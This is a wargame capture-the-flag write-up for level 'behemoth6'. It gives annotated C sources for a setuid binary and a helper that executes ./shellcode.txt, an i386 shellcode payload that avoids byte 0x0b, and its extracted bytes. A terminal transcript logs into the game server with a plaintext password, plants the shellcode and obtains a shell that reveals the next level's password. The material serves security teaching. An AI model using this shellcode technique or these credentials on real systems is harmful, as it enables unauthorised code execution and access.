/* behemoth6.c */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
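/*
 * behemoth6: runs the helper /behemoth/behemoth6_reader, reads the first ten
 * bytes it prints and, if they spell "HelloKitty", hands the caller a shell
 * (the transcript below shows that shell running as behemoth7).
 *
 * Trust boundary (the intended flaw of this level): the helper executes
 * whatever is in ./shellcode.txt in the caller's working directory, so every
 * byte it prints is attacker-controlled. Comparing against a fixed, public
 * string is not an authentication check; anyone who can make the helper print
 * "HelloKitty" reaches the execl below.
 *
 * Returns 0 after "Incorrect output." (the level's negative answer), does not
 * return after a successful execl, and exits non-zero on setup failures.
 */
int main(int argc, char *argv[])
{
    /* Exactly the ten bytes of "HelloKitty"; one more byte is kept for '\0'. */
    enum { EXPECTED_LEN = 10 };
    static const char expected[] = "HelloKitty";
    FILE *fp;
    char *buf;
    size_t got;

    (void)argc;
    (void)argv;

    fp = popen("/behemoth/behemoth6_reader", "r");
    if (fp == NULL) {
        puts("Failed to create pipe.");
        exit(EXIT_FAILURE); /* the original exited 0 here, reporting success on failure */
    }

    /*
     * The original did malloc(10) and fread(buf, 10, 1, fp) with no terminator
     * and then called strcmp on the result: a heap over-read that only worked
     * because fresh heap memory happened to be zero. Allocate room for a
     * terminator and always terminate at the number of bytes actually read, so
     * a short read (helper crashed early, wrote fewer than ten bytes) simply
     * compares unequal instead of comparing garbage.
     */
    buf = malloc(EXPECTED_LEN + 1);
    if (buf == NULL) {
        pclose(fp);
        puts("Out of memory.");
        exit(EXIT_FAILURE);
    }
    got = fread(buf, 1, EXPECTED_LEN, fp);
    buf[got] = '\0';

    /*
     * The helper's exit status is not examined (the transcript below shows it
     * dying with a segmentation fault after writing the string, and the level
     * still passing). A hardened build would reject a child that did not exit
     * 0; it is left unchecked here because that is what the challenge relies on.
     */
    pclose(fp);

    if (strcmp(buf, expected) != 0) {
        puts("Incorrect output.");
        free(buf);
        return 0;
    }
    free(buf);

    puts("Correct.");
    /* POSIX requires execl's argument list terminator to be a (char *)0, not a bare NULL. */
    execl("/bin/sh", "sh", (char *)NULL);

    /* Only reached if execl itself failed. */
    perror("execl");
    return EXIT_FAILURE;
}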
/* behemoth6_reader.c */
#include <stdio.h>
#include <stdlib.h>
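/*
 * behemoth6_reader: loads ./shellcode.txt (relative to the current working
 * directory) into a heap buffer, refuses it if any byte is 0x0b, and then
 * calls into the buffer.
 *
 * Security notes:
 *  - The path is relative, so whoever runs the helper chooses the code it
 *    executes; this is the intended flaw of the level. Its stdout is what
 *    behemoth6 compares against "HelloKitty".
 *  - Rejecting a single byte value is a denylist, not a sandbox. 11 is the
 *    i386 execve syscall number, so the check presumably targets the common
 *    "mov al, 0xb" shell spawner; that value can be computed at run time and
 *    every other syscall is untouched (the transcript's payload just calls
 *    write).
 *  - Jumping into malloc'd memory requires an executable heap; with NX
 *    enforced this faults instead of running.
 *
 * The stack-slot comments on the locals are the offsets from %esp used by the
 * shipped binary (see the disassembly below).
 */
int main(int argc, char *argv[])
{
    FILE *fp;             /* 0x20 */
    long fsize;           /* 0x24 */
    void (*func)(void);   /* 0x2c */
    unsigned char *buf;   /* 0x28 */
    long i;               /* 0x1c */

    (void)argc;
    (void)argv;

    fp = fopen("shellcode.txt", "r");
    if (fp == NULL) {
        puts("Couldn't open shellcode.txt!");
        return 0;
    }

    /*
     * ftell returns -1 on failure; the original fed that straight into malloc
     * (as a huge size_t) and then fread into the resulting NULL. An empty file
     * is rejected as well: there is nothing to call into.
     */
    if (fseek(fp, 0, SEEK_END) != 0) {
        puts("Couldn't read shellcode.txt!");
        fclose(fp);
        return 0;
    }
    fsize = ftell(fp);
    if (fsize <= 0) {
        puts("Couldn't read shellcode.txt!");
        fclose(fp);
        return 0;
    }
    rewind(fp);

    buf = malloc((size_t)fsize);
    if (buf == NULL) {
        puts("Out of memory.");
        fclose(fp);
        return 0;
    }
    /* A short read would leave uninitialised heap bytes that are then executed. */
    if (fread(buf, 1, (size_t)fsize, fp) != (size_t)fsize) {
        puts("Couldn't read shellcode.txt!");
        fclose(fp);
        free(buf);
        return 0;
    }
    fclose(fp);

    /* Denylist of one byte value; see the header note on why this is weak. */
    for (i = 0; i < fsize; i++) {
        if (buf[i] == 0x0b) {
            puts("Write your own shellcode.");
            exit(1);
        }
    }

    /*
     * Converting an object pointer to a function pointer is not defined by
     * ISO C; it works on the i386 flat-memory target this level runs on. The
     * callee is expected to return or exit by itself; the transcript's payload
     * does neither and segfaults after its write().
     */
    func = (void (*)(void))buf;
    (*func)();
    return 0;
}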
; shellcode.asm
BITS 32 ; i386 payload for behemoth6_reader: write(1, "HelloKitty", 10)
global _start
section .text
; Constraints imposed by the reader: the file is loaded with fread, so NUL
; bytes are allowed; the only forbidden byte is 0x0b. The assembled bytes
; (objdump output below) contain no 0x0b.
_start:
push 0x04 ; eax = 4 = SYS_write (i386), set via push/pop
pop eax
xor ebx,ebx
inc ebx ; ebx = 1 = stdout
xor esi, esi ; esi = 0
push esi ; four zero bytes: a terminator after the string (write() itself does not need one)
push 0x79747469 ; little-endian in memory: 'i','t','t','y'
push 0x4b6f6c6c ; 'l','l','o','K'
push 0x65485555 ; 'U','U','H','e' -- two pad bytes first, since 10 is not a multiple of 4; the stack now reads "UUHelloKitty\0"
mov ecx, esp ; ecx -> "UUHelloKitty"
inc ecx
inc ecx ; skip the two pad bytes: ecx -> "HelloKitty"
mov edx,eax
add edx,eax
inc edx
inc edx ; edx = 4 + 4 + 1 + 1 = 10, the length of "HelloKitty" (built arithmetically out of NUL-free habit; NULs are in fact allowed here)
int 0x80 ; write(1, "HelloKitty", 10)
; Nothing follows the syscall, so execution runs off the end of the buffer
; into whatever bytes come next in memory: the "Segmentation fault" seen in
; the transcript below. The string has already reached the pipe by then and
; behemoth6 ignores the child's exit status, so the level still passes. A tidy
; payload would append an exit(0): xor eax,eax / inc eax / xor ebx,ebx /
; int 0x80 (bytes 31 c0 40 31 db cd 80, none of them 0x0b).
栈环境
root@today:~# nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.o
root@today:~# ld -o shellcode shellcode.o -g
root@today:~# ./shellcode
HelloKittySegmentation fault
root@today:~# for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80
root@today:~# ssh behemoth6@178.79.134.250
behemoth6@178.79.134.250's password: mayiroeche
behemoth6@melinda:~$ cd /tmp
behemoth6@melinda:/tmp$ mkdir shui6
behemoth6@melinda:/tmp$ cd shui6
behemoth6@melinda:/tmp/shui6$ python -c 'print "\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80"' > shellcode.txt
behemoth6@melinda:/tmp/shui6$ /behemoth/behemoth6
Segmentation fault
Correct.
$ whoami
behemoth7
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo
$ exit
behemoth6.S
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804857d <main> push %ebp │
│0x804857e <main+1> mov %esp,%ebp │
│0x8048580 <main+3> and $0xfffffff0,%esp │
│0x8048583 <main+6> sub $0x20,%esp │
│0x8048586 <main+9> movl $0x80486f0,0x4(%esp) │
│0x804858e <main+17> movl $0x80486f2,(%esp) │
│0x8048595 <main+24> call 0x80483f0 <popen@plt> │
│0x804859a <main+29> mov %eax,0x18(%esp) │
│0x804859e <main+33> cmpl $0x0,0x18(%esp) │
│0x80485a3 <main+38> jne 0x80485bd <main+64> │
│0x80485a5 <main+40> movl $0x804870d,(%esp) │
│0x80485ac <main+47> call 0x8048420 <puts@plt> │
│0x80485b1 <main+52> movl $0x0,(%esp) │
│0x80485b8 <main+59> call 0x8048440 <exit@plt> │
│0x80485bd <main+64> movl $0xa,(%esp) │
│0x80485c4 <main+71> call 0x8048410 <malloc@plt> │
│0x80485c9 <main+76> mov %eax,0x1c(%esp) │
│0x80485cd <main+80> mov 0x18(%esp),%eax │
│0x80485d1 <main+84> mov %eax,0xc(%esp) │
│0x80485d5 <main+88> movl $0x1,0x8(%esp) │
│0x80485dd <main+96> movl $0xa,0x4(%esp) │
│0x80485e5 <main+104> mov 0x1c(%esp),%eax │
│0x80485e9 <main+108> mov %eax,(%esp) │
│0x80485ec <main+111> call 0x8048400 <fread@plt> │
│0x80485f1 <main+116> mov 0x18(%esp),%eax │
│0x80485f5 <main+120> mov %eax,(%esp) │
│0x80485f8 <main+123> call 0x8048450 <pclose@plt> │
│0x80485fd <main+128> movl $0x8048724,0x4(%esp) │
│0x8048605 <main+136> mov 0x1c(%esp),%eax │
│0x8048609 <main+140> mov %eax,(%esp) │
│0x804860c <main+143> call 0x80483e0 <strcmp@plt> │
│0x8048611 <main+148> test %eax,%eax │
│0x8048613 <main+150> jne 0x804863f <main+194> │
│0x8048615 <main+152> movl $0x804872f,(%esp) │
│0x804861c <main+159> call 0x8048420 <puts@plt> │
│0x8048621 <main+164> movl $0x0,0x8(%esp) │
│0x8048629 <main+172> movl $0x8048738,0x4(%esp) │
│0x8048631 <main+180> movl $0x804873b,(%esp) │
│0x8048638 <main+187> call 0x8048470 <execl@plt> │
│0x804863d <main+192> jmp 0x804864b <main+206> │
│0x804863f <main+194> movl $0x8048743,(%esp) │
│0x8048646 <main+201> call 0x8048420 <puts@plt> │
│0x804864b <main+206> mov $0x0,%eax │
│0x8048650 <main+211> leave │
│0x8048651 <main+212> ret │
└─────────────────────────────────────────────────────────────────────────────────┘
behemoth6_reader.S
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x80485ad <main> push %ebp │
│0x80485ae <main+1> mov %esp,%ebp │
│0x80485b0 <main+3> and $0xfffffff0,%esp │
│0x80485b3 <main+6> sub $0x30,%esp │
│0x80485b6 <main+9> movl $0x8048750,0x4(%esp) │
│0x80485be <main+17> movl $0x8048752,(%esp) │
│0x80485c5 <main+24> call 0x80484a0 <fopen@plt> │
│0x80485ca <main+29> mov %eax,0x20(%esp) │
│0x80485ce <main+33> cmpl $0x0,0x20(%esp) │
│0x80485d3 <main+38> jne 0x80485e6 <main+57> │
│0x80485d5 <main+40> movl $0x8048760,(%esp) │
│0x80485dc <main+47> call 0x8048450 <puts@plt> │
│0x80485e1 <main+52> jmp 0x80486ae <main+257> │
│0x80485e6 <main+57> movl $0x2,0x8(%esp) │
│0x80485ee <main+65> movl $0x0,0x4(%esp) │
│0x80485f6 <main+73> mov 0x20(%esp),%eax │
│0x80485fa <main+77> mov %eax,(%esp) │
│0x80485fd <main+80> call 0x8048420 <fseek@plt> │
│0x8048602 <main+85> mov 0x20(%esp),%eax │
│0x8048606 <main+89> mov %eax,(%esp) │
│0x8048609 <main+92> call 0x8048490 <ftell@plt> │
│0x804860e <main+97> mov %eax,0x24(%esp) │
│0x8048612 <main+101> mov 0x20(%esp),%eax │
│0x8048616 <main+105> mov %eax,(%esp) │
│0x8048619 <main+108> call 0x8048410 <rewind@plt> │
│0x804861e <main+113> mov 0x24(%esp),%eax │
│0x8048622 <main+117> mov %eax,(%esp) │
│0x8048625 <main+120> call 0x8048440 <malloc@plt> │
│0x804862a <main+125> mov %eax,0x28(%esp) │
│0x804862e <main+129> mov 0x24(%esp),%eax │
│0x8048632 <main+133> mov 0x20(%esp),%edx │
│0x8048636 <main+137> mov %edx,0xc(%esp) │
│0x804863a <main+141> movl $0x1,0x8(%esp) │
│0x8048642 <main+149> mov %eax,0x4(%esp) │
│0x8048646 <main+153> mov 0x28(%esp),%eax │
│0x804864a <main+157> mov %eax,(%esp) │
│0x804864d <main+160> call 0x8048430 <fread@plt> │
│0x8048652 <main+165> mov 0x20(%esp),%eax │
│0x8048656 <main+169> mov %eax,(%esp) │
│0x8048659 <main+172> call 0x8048400 <fclose@plt> │
│0x804865e <main+177> movl $0x0,0x1c(%esp) │
│0x8048666 <main+185> jmp 0x8048696 <main+233> │
│0x8048668 <main+187> mov 0x1c(%esp),%edx │
│0x804866c <main+191> mov 0x28(%esp),%eax │
│0x8048670 <main+195> add %edx,%eax │
│0x8048672 <main+197> movzbl (%eax),%eax │
│0x8048675 <main+200> cmp $0xb,%al │
│0x8048677 <main+202> jne 0x8048691 <main+228> │
│0x8048679 <main+204> movl $0x804877d,(%esp) │
│0x8048680 <main+211> call 0x8048450 <puts@plt> │
│0x8048685 <main+216> movl $0x1,(%esp) │
│0x804868c <main+223> call 0x8048470 <exit@plt> │
│0x8048691 <main+228> addl $0x1,0x1c(%esp) │
│0x8048696 <main+233> mov 0x1c(%esp),%eax │
│0x804869a <main+237> cmp 0x24(%esp),%eax │
│0x804869e <main+241> jl 0x8048668 <main+187> │
│0x80486a0 <main+243> mov 0x28(%esp),%eax │
│0x80486a4 <main+247> mov %eax,0x2c(%esp) │
│0x80486a8 <main+251> mov 0x2c(%esp),%eax │
│0x80486ac <main+255> call *%eax │
│0x80486ae <main+257> mov $0x0,%eax │
│0x80486b3 <main+262> leave │
│0x80486b4 <main+263> ret │
└─────────────────────────────────────────────────────────────────────────────────┘